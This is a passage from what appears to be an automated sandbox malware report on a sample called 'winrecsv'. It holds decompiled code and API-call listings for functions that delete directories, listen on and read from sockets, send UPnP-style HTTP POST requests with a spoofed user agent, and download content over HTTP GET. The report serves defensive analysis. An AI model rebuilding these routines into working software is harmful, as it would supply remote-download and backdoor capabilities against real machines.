                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404BB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                  • String ID: %s\%s$%s\%s$%s\*$[P@
                                                                                  • API String ID: 92872011-505645206
                                                                                  • Opcode ID: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction ID: 4312a352e9e7f9f4b9df3eadcbdfd99b35f9a62cedde5f9254868b67503f5fd5
                                                                                  • Opcode Fuzzy Hash: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction Fuzzy Hash: 5D3178B5900218ABCB10DBA0DC88FEA7778AB88311F40C599F709A7155DB75EAC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040B8F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				intOrPtr _t43;
                                                                                  
                                                                                  				_v12 = _a16;
                                                                                  				if(_a16 != 0xffffffff) {
                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                  				}
                                                                                  				_v8 = _a8;
                                                                                  				while(1) {
                                                                                  					_v16 = 0;
                                                                                  					_t38 = _a4;
                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                  					if(_t38 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_v16 > 0) {
                                                                                  						if(_v16 >= _a12) {
                                                                                  							_v24 = _a12;
                                                                                  						} else {
                                                                                  							_v24 = _v16;
                                                                                  						}
                                                                                  						_t43 = _a4;
                                                                                  						__imp__#16(_t43, _v8, _v24, 0);
                                                                                  						_v20 = _t43;
                                                                                  						if(_v20 > 0) {
                                                                                  							if(_a16 != 0xffffffff) {
                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                  							}
                                                                                  							_a12 = _a12 - _v20;
                                                                                  							_v8 = _v8 + _v20;
                                                                                  						}
                                                                                  					}
                                                                                  					Sleep(1);
                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                  						L15:
                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                  					} else {
                                                                                  						continue;
                                                                                  					}
                                                                                  				}
                                                                                  				goto L15;
                                                                                  			}

                                                                                  Address column (decompiler listing): 0x0040b8f9, 0x0040b900, 0x0040b90b, 0x0040b90b, 0x0040b911, 0x0040b914, 0x0040b914, 0x0040b924, 0x0040b928, 0x0040b931,
                                                                                  0x00000000, 0x00000000, 0x0040b939, 0x0040b941, 0x0040b94e, 0x0040b943, 0x0040b946, 0x0040b946, 0x0040b95b, 0x0040b95f,
                                                                                  0x0040b965, 0x0040b96c, 0x0040b972, 0x0040b97d, 0x0040b97d, 0x0040b986, 0x0040b98f, 0x0040b98f, 0x0040b96c, 0x0040b994,
                                                                                  0x0040b9a3, 0x0040b9af, 0x0040b9bb, 0x00000000, 0x00000000, 0x00000000, 0x0040b9a3, 0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040B902
                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B928
                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B95F
                                                                                  • GetTickCount.KERNEL32 ref: 0040B974
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040B994
                                                                                  • GetTickCount.KERNEL32 ref: 0040B99A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                  • String ID:
                                                                                  • API String ID: 107502007-0
                                                                                  • Opcode ID: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction ID: b5ebabbcfa87b5d5b6093c606dafa0a0568610fd24292d9ee39f828ceab0bc2d
                                                                                  • Opcode Fuzzy Hash: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction Fuzzy Hash: 2831F0B4900209DFCB04DFA8D948BEE7BB1FF44315F108669E915A3390D7749A90CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040E7A0(intOrPtr* _a4) {
                                                                                  				intOrPtr _v64;
                                                                                  				char _v68;
                                                                                  				long _v72;
                                                                                  				signed char _v80;
                                                                                  				long _v92;
                                                                                  				char _v96;
                                                                                  				char _v100;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __ebp;
                                                                                  				long _t31;
                                                                                  				long _t33;
                                                                                  				long _t34;
                                                                                  				long _t42;
                                                                                  				intOrPtr _t49;
                                                                                  				intOrPtr* _t56;
                                                                                  				intOrPtr _t70;
                                                                                  				intOrPtr* _t73;
                                                                                  				long _t74;
                                                                                  				intOrPtr _t75;
                                                                                  				struct _CRITICAL_SECTION* _t76;
                                                                                  				intOrPtr* _t77;
                                                                                  				void* _t78;
                                                                                  				signed int _t79;
                                                                                  				void* _t81;
                                                                                  
                                                                                  				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                  				_t31 = GetTickCount();
                                                                                  				_t56 = _a4;
                                                                                  				_v72 = _t31;
                                                                                  				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				if(_t33 == 0) {
                                                                                  					L25:
                                                                                  					return _t33;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					_t73 = _t56 + 0x18;
                                                                                  					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                  					if(_t33 != 0x102) {
                                                                                  						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                  						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                  							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                  							_v100 = 0x10;
                                                                                  							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                  							if(_t49 != 0xffffffff) {
                                                                                  								_t77 = E0040E330(_t56, _t49);
                                                                                  								_t81 = _t81 + 4;
                                                                                  								if(_t77 != 0) {
                                                                                  									_t15 = _t77 + 0x264; // 0x264
                                                                                  									E0040E5C0(0, _t77, _t56, _t15);
                                                                                  									_t81 = _t81 + 8;
                                                                                  									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                  										E0040EB70(_t77);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t34 = GetTickCount();
                                                                                  					_t74 = _v92;
                                                                                  					if(_t34 - _t74 < 0x3e8) {
                                                                                  						if(GetTickCount() - _t74 < 0x2710) {
                                                                                  							goto L24;
                                                                                  						}
                                                                                  						EnterCriticalSection(_t56 + 0x20);
                                                                                  						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  						if(_t75 == 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(_t56 + 0x20);
                                                                                  							_v92 = GetTickCount();
                                                                                  							goto L24;
                                                                                  						} else {
                                                                                  							goto L19;
                                                                                  						}
                                                                                  						do {
                                                                                  							L19:
                                                                                  							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                  							if(E0040C210() - _t42 >= 0x1e) {
                                                                                  								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                  								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                  									E00409940(_t45);
                                                                                  									_t81 = _t81 + 4;
                                                                                  									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                  								}
                                                                                  							}
                                                                                  							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                  						} while (_t75 != 0);
                                                                                  						goto L23;
                                                                                  					}
                                                                                  					_t76 = _t56 + 0x20;
                                                                                  					EnterCriticalSection(_t76);
                                                                                  					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  					if(_t70 == 0) {
                                                                                  						L16:
                                                                                  						LeaveCriticalSection(_t76);
                                                                                  						goto L24;
                                                                                  					}
                                                                                  					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                  						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                  						if(_t70 != 0) {
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							LeaveCriticalSection(_t76);
                                                                                  							goto L24;
                                                                                  						}
                                                                                  					}
                                                                                  					E0040E6A0(_t56, _t70, _t78);
                                                                                  					goto L16;
                                                                                  					L24:
                                                                                  					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				} while (_t33 != 0);
                                                                                  				goto L25;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040E7AC
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E7BF
                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E7D9
                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E7F6
                                                                                  • accept.WS2_32(?,?,?), ref: 0040E828
                                                                                  • GetTickCount.KERNEL32 ref: 0040E876
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E889
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8AA
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8BB
                                                                                  • GetTickCount.KERNEL32 ref: 0040E8C3
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E8D2
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E8E5
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E925
                                                                                  • GetTickCount.KERNEL32 ref: 0040E92B
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E93B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 3345448188-3762367603
                                                                                  • Opcode ID: ddcfcdcee3c2ae824924be147f9dbba23bab9420998bd361808692b531119574
                                                                                  • Instruction ID: a4307afca7aad85b9c9d9f5dd23984def65cc417f4fb2f5aaa278dd0cd3fd46e
                                                                                  • Opcode Fuzzy Hash: ddcfcdcee3c2ae824924be147f9dbba23bab9420998bd361808692b531119574
                                                                                  • Instruction Fuzzy Hash: AE4117725002009BCB10AF36DC88B9B77A4AB44720F048E39F899A72D1D778EC95CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040D110(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				char* _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char _v852;
                                                                                  				long _v856;
                                                                                  				void _v1884;
                                                                                  				long _v1888;
                                                                                  				void* _t102;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t103 = _t102 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                  							_t29 =  &_v852; // 0x410928
                                                                                  							if(HttpSendRequestA(_v848,  *_t29, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                  								_v856 = 0;
                                                                                  								while(1 != 0) {
                                                                                  									_t98 = _v848;
                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                  										_v776 = E00408EA0(_v776, _t98, _v776, _v856 + _v1888);
                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                  										_t103 = _t103 + 0x14;
                                                                                  										_v856 = _v856 + _v1888;
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								 *_a16 = _v856;
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}

                                                                                  Instruction addresses: 0x0040d119 0x0040d123 0x0040d138 0x0040d13d 0x0040d140 0x0040d150 0x0040d156 0x0040d166 0x0040d16c 0x0040d188 0x0040d1a1 0x0040d1ae 0x0040d1da 0x0040d1e7 0x0040d210 0x0040d21d 0x0040d235 0x0040d23b 0x0040d251 0x0040d267 0x0040d26d 0x0040d277 0x0040d297 0x0040d2a6 0x0040d2cf 0x0040d2f0 0x0040d2f5 0x0040d304 0x00000000 0x0040d304 0x00000000 0x0040d2a6 0x0040d318 0x0040d318 0x0040d321 0x0040d321 0x0040d32e 0x0040d32e 0x0040d33b 0x0040d33b 0x0040d34a

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D138
                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040D188
                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040D19B
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040D1D4
                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D20A
                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040D235
                                                                                  • HttpSendRequestA.WININET(00000000,(A,000000FF,00009E34), ref: 0040D25F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040D29E
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040D2F0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D321
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D32E
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D33B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                  • String ID: (A$<$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                  • API String ID: 2761394606-712686588
                                                                                  • Opcode ID: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction ID: 9d1df4d468acb1d33fa47fc6a9b1e55a6919e6c831fa6972c8ee7f2cc9406756
                                                                                  • Opcode Fuzzy Hash: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction Fuzzy Hash: 43511CB59012289BDB26CF94DC54BE973BDAB48705F1081E9B50DA6280D7B8AFC4CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040E480(intOrPtr* __edi) {
                                                                                  				void* __esi;
                                                                                  				void* _t25;
                                                                                  				long _t40;
                                                                                  				intOrPtr* _t53;
                                                                                  				intOrPtr* _t55;
                                                                                  				void* _t56;
                                                                                  				LONG* _t62;
                                                                                  
                                                                                  				_t53 = __edi;
                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                  					return _t25;
                                                                                  				} else {
                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                  					EnterCriticalSection(_t1);
                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                  					if(_t55 == 0) {
                                                                                  						L11:
                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                  						LeaveCriticalSection(_t13);
                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                  						_t56 = 0;
                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                  							L14:
                                                                                  							E0040C040( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                  							E0040C180( *((intOrPtr*)(_t53 + 0xc)));
                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                  							E00409940( *((intOrPtr*)(_t53 + 0x14)));
                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                  							DeleteCriticalSection(_t24);
                                                                                  							return E00408FB0(_t53);
                                                                                  						}
                                                                                  						do {
                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                  						goto L14;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					do {
                                                                                  						L3:
                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                  								_t62 = _t55 + 0x21c;
                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                  								if(_t40 == 0) {
                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                  									InterlockedIncrement(_t62);
                                                                                  									if(E0040EAD0(_t55) == 0) {
                                                                                  										InterlockedDecrement(_t62);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                  					} while (_t55 != 0);
                                                                                  					goto L11;
                                                                                  				}
                                                                                  			}

                                                                                  Instruction addresses: 0x0040e480 0x0040e482 0x0040e5b7 0x0040e494 0x0040e496 0x0040e49a 0x0040e4a0 0x0040e4a5 0x0040e530 0x0040e530 0x0040e534 0x0040e53e 0x0040e544 0x0040e549 0x0040e563 0x0040e569 0x0040e572 0x0040e584 0x0040e58a 0x0040e590 0x0040e59a 0x0040e5a2 0x0040e5a6 0x00000000 0x0040e5b6 0x0040e551 0x0040e55b 0x0040e55d 0x0040e55e 0x00000000 0x00000000 0x00000000 0x00000000 0x0040e4ab 0x0040e4ab 0x0040e4b1 0x0040e4d3 0x0040e4d7 0x0040e4de 0x0040e4e6 0x0040e4ec 0x0040e4f2 0x0040e4fc 0x0040e502 0x0040e50c 0x0040e519 0x0040e51c 0x0040e51c 0x0040e519 0x0040e4e6 0x0040e4d3 0x0040e522 0x0040e528 0x00000000 0x0040e4ab

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040BD00,?,0040F024), ref: 0040E49A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E4C6
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E4DE
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040E50C
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E51C
                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040F024), ref: 0040E534
                                                                                  • SetEvent.KERNEL32(?,?,0040F024), ref: 0040E53E
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040F024), ref: 0040E55B
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E584
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E58A
                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040E590
                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040F024), ref: 0040E5A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 2403999931-3762367603
                                                                                  • Opcode ID: 7edd7c1c4f50b0dd13758a6fdc0e9c87cf719057548fc6c1492c4cc13c3ad051
                                                                                  • Instruction ID: 93d8e349b18169af685d7a21951132cbb8c9c0fe64a1f5b9dbcdc35934fd6ed3
                                                                                  • Opcode Fuzzy Hash: 7edd7c1c4f50b0dd13758a6fdc0e9c87cf719057548fc6c1492c4cc13c3ad051
                                                                                  • Instruction Fuzzy Hash: D3317475500705BBC710DBB1EC48B97B7A8BF08314F048E2EE95AA3691D778F864CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040C610(char* _a4, char** _a8) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				long _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char* _v852;
                                                                                  				void _v1876;
                                                                                  				long _v1880;
                                                                                  				void* _t91;
                                                                                  				void* _t92;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t92 = _t91 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                  								if(_a8 == 0) {
                                                                                  									_v776 = 1;
                                                                                  								} else {
                                                                                  									_v852 = 0;
                                                                                  									while(1 != 0) {
                                                                                  										_t87 = _v848;
                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                  											_v776 = E00408EA0(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                  											_t92 = _t92 + 0x14;
                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                  											continue;
                                                                                  										}
                                                                                  										break;
                                                                                  									}
                                                                                  									 *_a8 = _v852;
                                                                                  								}
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040C638
                                                                                  • InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C7CA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C814
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C821
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                  • String ID: <$GET
                                                                                  • API String ID: 1205665004-427699995
                                                                                  • Opcode ID: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction ID: 09436683f8244ffa9c701ea93985ed9ede5934815d9b1926990d38fc667447ad
                                                                                  • Opcode Fuzzy Hash: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
